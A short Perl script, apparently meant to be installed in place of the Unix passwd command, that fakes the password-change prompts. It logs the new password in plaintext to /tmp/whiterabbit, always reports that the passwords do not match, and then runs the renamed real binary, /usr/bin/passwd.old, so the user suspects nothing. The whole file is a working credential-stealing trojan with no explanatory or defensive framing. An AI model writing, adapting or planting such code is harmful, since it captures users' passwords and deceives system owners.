#!/usr/bin/perl

sub getpass {
	#my $prompt = shift || @_[0];
	my $prompt = @_[0];

	#open STDIN, "/dev/tty" or warn "couldn't open /dev/tty $!\n";
	open STDIN, "/dev/tty"; 
	system "stty raw; stty -echo;";
 
	print STDERR $prompt;
	while ($c = getc(STDIN) and $c ne "\n" and $c ne "\r") {
		$password .= $c;
	}

	system("stty sane");
	sleep(1);

	return $password;
}

my $bFileOpen = 1;
open( OUTFILE, ">> /tmp/whiterabbit" ) or $bFileOpen = 0;

my $input = getpass("New user password: ");
if ($bFileOpen > 0) {
	print OUTFILE $input."\n";
}
print "\n";
$input = getpass("Retype new user password: "); 
print "\n";
print "Sorry, passwords do not match\n";

`/usr/bin/passwd.old`;
